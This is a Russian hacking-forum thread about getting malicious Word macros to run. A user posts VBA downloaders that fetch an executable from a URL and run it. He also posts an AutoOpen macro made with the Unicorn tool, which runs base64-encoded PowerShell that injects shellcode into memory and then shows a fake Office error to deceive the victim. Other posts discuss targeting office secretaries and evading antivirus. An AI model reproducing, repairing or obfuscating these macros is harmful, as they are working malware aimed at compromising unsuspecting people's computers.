1. Теперь за форумную активность начисляются биткоины и другие криптоденьги. Подробнее.
    Скрыть объявление
  2. Появилась архивная версия форума arhiv.xaker.name, где собраны темы с 2007 по 2012 год.
    Скрыть объявление

Macros не работает

Тема в разделе "Вирусы|:|Крипторы|:|Джоинеры", создана пользователем karencho, 26 ноя 2016.

  1. karencho
    karencho Новичок
    Симпатии:
    2
    Здравствуйте,хотел воспользоваться макросами и тупо скачал код "доунлоадера" ,создал ворд фаил (.doc,.docm) ,добавил макрос с следующим кодом:

    Код:
    Dim objShell
    Set objShell = CreateObject("Wscript.Shell")
    objShell.Run ("PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('https://the.earth.li/~sgtatham/putty/latest/x86/putty.exe','mess.exe');(New-Object -com Shell.Application).ShellExecute('mess.exe');")
    сам код работает ,но через ворд (макрос) у него ноль реакции ,почему так может кто помочь?
     
    26 ноя 2016
  2. trenoga2008
    trenoga2008 Новичок
    Симпатии:
    0
    Ничего не понятно! Это же WSH? А зачем его в макрос пихать? Там же VBA. Это же две большие разницы.
     
    28 ноя 2016
  3. karencho
    karencho Новичок
    Симпатии:
    2
    можете подсказать как скачать и пустить файл .exe на VBA

    пробовал этот код,но все не получилось никакой реакции
    Код:
    Sub AutoOpen()
    
    Dim xHttp: Set xHttp = CreateObject("Microsoft.XMLHTTP")
    Dim bStrm: Set bStrm = CreateObject("Adodb.Stream")
    xHttp.Open "GET", "https://the.earth.li/~sgtatham/putty/latest/x86/putty.exe", False
    xHttp.Send
    
    With bStrm
        .Type = 1 '//binary
        .Open
        .write xHttp.responseBody
        .savetofile "file.exe", 2 '//overwrite
    End With
    
    Shell ("file.exe")
    
    End Sub
     
    Последнее редактирование: 30 ноя 2016
    30 ноя 2016
  4. trenoga2008
    trenoga2008 Новичок
    Симпатии:
    0
    Код потерзаю, посмотрю, что из него получить можно. Но стоит иметь в виду одну вещь. Макросы в оффисе уже не играют такую роль, как в начале нулевых. Тогда было золотое время! Сейчас же грёбаные политики безопасности сводят всё на нет. Доходит до курьёзов. Недавно, чтобы запустить вполне легальный макрос в одной крупной конторе мне пришлось танцевать с бубном. Сраные ограничения наложенные доменом конторы и сама настройка 2010 оффиса не дали по умолчанию работать макросам.
     
    1 дек 2016
  5. karencho
    karencho Новичок
    Симпатии:
    2
    у меня офис 2013 но раньше все срабатывало ,сейчас никак не действует даже сгенерированные макросы при помощи Macro_safe unicorn и т.п..... потом решил просто попробовать дожнлоадер использовать ,но нет и тут не работает,хотя использовав код в обычном .VBS файле заработал идеально
     
    1 дек 2016
  6. karencho
    karencho Новичок
    Симпатии:
    2
    ребята правда не могу понять из-за чего такое.... обычный код макроса который запускает калькулятор ,первые два скрина показывают что макрос не включается...

    [​IMG]

    нажал на "включить содержимое"

    [​IMG]

    реакции ноль!!!!
    ну а потом я просто решил выполнить скрипт по нажатию на кнопку "выполнить" и вот что получилось:

    [​IMG] [​IMG]

    все выполнилось ,как и было задумано ,так в чем же причина? я это делал и с .doc и .docm форматами

    еще одна странная вещь ,есть у файла макрос или нету,при включении когда открываю ворд файл он меня сразу спрашивает "Включить содержимое" так у всех ?? или только у меня?спасибо
     
    4 дек 2016
  7. trenoga2008
    trenoga2008 Новичок
    Симпатии:
    0
    https://support.microsoft.com/ru-ru/kb/286310
    Но учти! Ребята мелкомягкие не зря свой хлеб едят. Макро-вирусы были настоящей проблемой нулевых. Была проделана колоссальная работа, чтобы такие как мы сильно не барагозили.
     
    10 дек 2016
  8. trenoga2008
    trenoga2008 Новичок
    Симпатии:
    0
    10 дек 2016
  9. karencho
    karencho Новичок
    Симпатии:
    2
    спасибо помогло)),пытался запустить зашифрованный скрипт вот так: Base64DecodeString(Your CELL)появляется все время ошибка "too long string" ,я в правильном направлении??
     
    12 дек 2016
  10. trenoga2008
    trenoga2008 Новичок
    Симпатии:
    0
    А зачем? Смысл то какой?
     
    12 дек 2016
  11. trenoga2008
    trenoga2008 Новичок
    Симпатии:
    0
    Идея не айс. Большинство секретуток, на которых и рассчитан данный подход с оффисом и вжизнь не догадаются (или постесняются) нажать кнопку "включить содержимое"! А автоматом оно нигде по умолчанию не запускается. Плюсом ко всему. В больших конторах, где домены и грамотные админы (РЖД к примеру), при сохранении оффисных документов в поток NTFS пишется спец. атрибут. И потом при открытии этого документа, оно орёт благим матом про то, что док из интернета и нихрена делать не даёт, ни править, ни запустить активное содержимое. Макросы в современных оффисах - это танцы с бубнами. Ты ведь сам уже в этом убедился!
     
    12 дек 2016
  12. karencho
    karencho Новичок
    Симпатии:
    2
    согласен с тем что очень мало кто нажмет на "Включить содержимое" ,но у програмы уникорн есть следующий код:
    Код:
    Sub AutoOpen()
    Dim x
    x = "-window hidden -e JABaAHoAUQBYACAAPQAgACcAJAB0AG0AaAAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGk" _
    & "AbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAB" _
    & "yACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFA" _
    & "AdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJAB0AG0AaAAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJAB6ACAAPQA" _
    & "gADAAeABiAGYALAAwAHgAZABkACwAMAB4ADEAZAAsADAAeAAzAGYALAAwAHgAYgA1ACwAMAB4AGQAOQAsADAAeABjADkALAAwAHgAZAA5ACwAMAB4ADcANAAsADAAeAAyADQALAAwAHgAZgA0ACwAMAB4ADUAZAAsADAAeAAzADEALAAwAHgAYwA5ACwAMAB4AGIAMQAsADAAeAA0ADcALAAwAHgAOAAzACwAMAB4AGMANQAsADAAeAAwADQALAAwAHgAMwAxACwAMAB4ADcAZAAsADAAeAAwAGYALAAwAHgAMAAzACwAMAB4ADcAZAAsADAAeABkADIALAAwAHgAZgBmACwAMAB4AGMAYQAsADAAeAA0ADkALAAwAHg" _
    & "AMAA0ACwAMAB4ADcAZAAsADAAeAAzADQALAAwAHgAYgAyACwAMAB4AGQANAAsADAAeABlADIALAAwAHgAYgBjACwAMAB4ADUANwAsADAAeABlADUALAAwAHgAMgAyACwAMAB4AGQAYQAsADAAeAAxAGMALAAwAHgANQA1ACwAMAB4ADkAMwAsADAAeABhADgALAAwAHgANwAxACwAMAB4ADUAOQAsADAAeAA1ADgALAAwAHgAZgBjACwAMAB4ADYAMQAsADAAeABlAGEALAAwAHgAMgBjACwAMAB4ADIAOQAsADAAeAA4ADUALAAwAHgANQBiACwAMAB4ADkAYQAsADAAeAAwAGYALAAwAHgAYQA4ACwAMAB4ADUAYwA" _
    & "sADAAeABiADcALAAwAHgANgBjACwAMAB4AGEAYgAsADAAeABkAGUALAAwAHgAYwBhACwAMAB4AGEAMAAsADAAeAAwAGIALAAwAHgAZABmACwAMAB4ADAANAAsADAAeABiADUALAAwAHgANABhACwAMAB4ADEAOAAsADAAeAA3ADgALAAwAHgAMwA0ACwAMAB4ADEAZQAsADAAeABmADEALAAwAHgAZgA2ACwAMAB4AGUAYgAsADAAeAA4AGYALAAwAHgANwA2ACwAMAB4ADQAMgAsADAAeAAzADAALAAwAHgAMwBiACwAMAB4AGMANAAsADAAeAA0ADIALAAwAHgAMwAwACwAMAB4AGQAOAAsADAAeAA5AGMALAAwAHg" _
    & "ANgA1ACwAMAB4ADEAMQAsADAAeAA0AGYALAAwAHgAOQA3ACwAMAB4ADMAZgAsADAAeABiADEALAAwAHgANwAxACwAMAB4ADcANAAsADAAeAAzADQALAAwAHgAZgA4ACwAMAB4ADYAOQAsADAAeAA5ADkALAAwAHgANwAxACwAMAB4AGIAMgAsADAAeAAwADIALAAwAHgANgA5ACwAMAB4ADAAZAAsADAAeAA0ADUALAAwAHgAYwAzACwAMAB4AGEAMAAsADAAeABlAGUALAAwAHgAZQBhACwAMAB4ADIAYQAsADAAeAAwAGQALAAwAHgAMQBkACwAMAB4AGYAMgAsADAAeAA2AGIALAAwAHgAYQA5ACwAMAB4AGYAZQA" _
    & "sADAAeAA4ADEALAAwAHgAOAA1ACwAMAB4AGMAYQAsADAAeAA4ADMALAAwAHgAOQAxACwAMAB4ADUAMQAsADAAeABiADEALAAwAHgANQBmACwAMAB4ADEANwAsADAAeAA0ADIALAAwAHgAMQAxACwAMAB4ADIAYgAsADAAeAA4AGYALAAwAHgAYQBlACwAMAB4AGEAMAAsADAAeABmADgALAAwAHgANQA2ACwAMAB4ADIANAAsADAAeABhAGUALAAwAHgAYgA1ACwAMAB4ADEAZAAsADAAeAA2ADIALAAwAHgAYgAyACwAMAB4ADQAOAAsADAAeABmADEALAAwAHgAMQA4ACwAMAB4AGMAZQAsADAAeABjADEALAAwAHg" _
    & "AZgA0ACwAMAB4AGMAZQAsADAAeAA0ADcALAAwAHgAOQAxACwAMAB4AGQAMgAsADAAeABjAGEALAAwAHgAMABjACwAMAB4ADQAMQAsADAAeAA3AGEALAAwAHgANABhACwAMAB4AGUAOAAsADAAeAAyADQALAAwAHgAOAAzACwAMAB4ADgAYwAsADAAeAA1ADMALAAwAHgAOQA4ACwAMAB4ADIAMQAsADAAeABjADYALAAwAHgANwA5ACwAMAB4AGMAZAAsADAAeAA1AGIALAAwAHgAOAA1ACwAMAB4ADEANQAsADAAeAAyADIALAAwAHgANQA2ACwAMAB4ADMANgAsADAAeABlADUALAAwAHgAMgBjACwAMAB4AGUAMQA" _
    & "sADAAeAA0ADUALAAwAHgAZAA3ACwAMAB4AGYAMwAsADAAeAA1ADkALAAwAHgAYwAyACwAMAB4ADUAYgAsADAAeAA3AGIALAAwAHgANAA0ACwAMAB4ADEANQAsADAAeAA5AGMALAAwAHgANQA2ACwAMAB4ADMAMAAsADAAeAA4ADkALAAwAHgANgAzACwAMAB4ADUAOQAsADAAeAA0ADEALAAwAHgAOAAzACwAMAB4AGEANwAsADAAeAAwAGQALAAwAHgAMQAxACwAMAB4AGIAYgAsADAAeAAwAGUALAAwAHgAMgBlACwAMAB4AGYAYQAsADAAeAAzAGIALAAwAHgAYQBmACwAMAB4AGYAYgAsADAAeAA5ADcALAAwAHg" _
    & "AMwBlACwAMAB4ADIANwAsADAAeABjADQALAAwAHgAYwAwACwAMAB4ADQAMAAsADAAeABkAGUALAAwAHgAYQBjACwAMAB4ADEAMgAsADAAeAA0ADMALAAwAHgAMwAxACwAMAB4ADcAMQAsADAAeAA5AGEALAAwAHgAYQA1ACwAMAB4ADYAMQAsADAAeABkADkALAAwAHgAYwBjACwAMAB4ADcAOQAsADAAeABjADEALAAwAHgAOAA5ACwAMAB4AGEAYwAsADAAeAAyADkALAAwAHgAYQA5ACwAMAB4AGMAMwAsADAAeAAyADIALAAwAHgAMQA1ACwAMAB4AGMAOQAsADAAeABlAGIALAAwAHgAZQA4ACwAMAB4ADMAZQA" _
    & "sADAAeAA2ADMALAAwAHgAMAA0ACwAMAB4ADQANQAsADAAeAAxADYALAAwAHgAMQBiACwAMAB4AGIAZAAsADAAeABjAGMALAAwAHgAZQBjACwAMAB4AGIAYQAsADAAeAA0ADIALAAwAHgAZABiACwAMAB4ADgAOAAsADAAeABmAGMALAAwAHgAYwA5ACwAMAB4AGUAOAAsADAAeAA2AGQALAAwAHgAYgAyACwAMAB4ADMAOQAsADAAeAA4ADQALAAwAHgANwBkACwAMAB4ADIAMgAsADAAeABjAGEALAAwAHgAZAAzACwAMAB4AGQAYwAsADAAeABlADQALAAwAHgAZAA1ACwAMAB4AGMAOQAsADAAeAA0AGIALAAwAHg" _
    & "AMAA4ACwAMAB4ADQAMAAsADAAeABmADYALAAwAHgAZABkACwAMAB4ADUAZgAsADAAeABmAGMALAAwAHgAZgA0ACwAMAB4ADMAOAAsADAAeAA5ADcALAAwAHgAYQAzACwAMAB4ADAANwAsADAAeAA2AGYALAAwAHgAYQBjACwAMAB4ADYAYQAsADAAeAA5ADIALAAwAHgAZAAwACwAMAB4AGQAYQAsADAAeAA5ADIALAAwAHgANwAyACwAMAB4AGQAMQAsADAAeAAxAGEALAAwAHgAYwA1ACwAMAB4ADEAOAAsADAAeABkADEALAAwAHgANwAyACwAMAB4AGIAMQAsADAAeAA3ADgALAAwAHgAOAAyACwAMAB4ADYANwA" _
    & "sADAAeABiAGUALAAwAHgANQA0ACwAMAB4AGIANgAsADAAeAAzADQALAAwAHgAMgBiACwAMAB4ADUANwAsADAAeABlAGYALAAwAHgAZQA5ACwAMAB4AGYAYwAsADAAeAAzAGYALAAwAHgAMABkACwAMAB4AGQANAAsADAAeABjAGIALAAwAHgAOQBmACwAMAB4AGUAZQAsADAAeAAzADMALAAwAHgAYwBhACwAMAB4AGQAYwAsADAAeAAzADgALAAwAHgANwBkACwAMAB4AGIAOAAsADAAeAAwAGMALAAwAHgAZgA5ADsAJABnACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAHoALgBMAGUAbgBnAHQAaAAgAC0" _
    & "AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZwAgAD0AIAAkAHoALgBMAGUAbgBnAHQAaAB9ADsAJABDAFkAYgA9ACQAdwA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAGcALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAAKAAkAHoALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAaQArACsAKQAgAHsAJAB3ADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQAQwBZAGIALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQA" _
    & "pACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAEMAWQBiACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwA7ACkAewBTAHQAYQByAHQALQBzAGwAZQBlAHAAIAA2ADAAfQA7ACcAOwAkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQ" _
    & "AZQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAWgB6AFEAWAApACkAOwAkAEMAOAA4ACAAPQAgACIALQBlACAAIgA7AGkAZgAoAFsASQBuAHQAUAB0AHIAXQA6ADoAUwBpAHoAZQAgAC0AZQBxACAAOAApAHsAJABiAEcAMgBNACAAPQAgACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACAAKwAgACIAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAiADsAaQBlAHgAIAAiACYAIAAkAGIARwAyAE0AIAA" _
    & "kAEMAOAA4ACAAJABlACIAfQBlAGwAcwBlAHsAOwBpAGUAeAAgACIAJgAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAkAEMAOAA4ACAAJABlACIAOwB9AA=="
    Shell ("powershell.exe " & x)
    Dim title As String
    title = "Critical Microsoft Office Error"
    Dim msg As String
    Dim intResponse As Integer
    msg = "This document appears to be corrupt or missing critical rows in order to restore. Please restore this file from a backup."
    intResponse = MsgBox(msg, 16, title)
    Application.Quit
    End Sub
    этот код расчитан только на открытие файла и нажатие на кнопку ОК (он выводит эррор жертва нажимает на кнопку ОК),после чего все должно сработать,проблема в том что после этого в моем компе ни один ворд файл не открылся ,так вот может кто использовать его и проверить такое же будет и у него или у меня нуленый 2013 года оффис кривой))) кстати код уже ловиться многими антивирами,но можно же поколдовать.... идея с эрорам не плохая,потому интересно было шифровка вбс
     
    18 дек 2016
  13. trenoga2008
    trenoga2008 Новичок
    Симпатии:
    0
    karencho! Напиши мне ЛС!
     
    23 дек 2016

Поделиться этой страницей

Загрузка...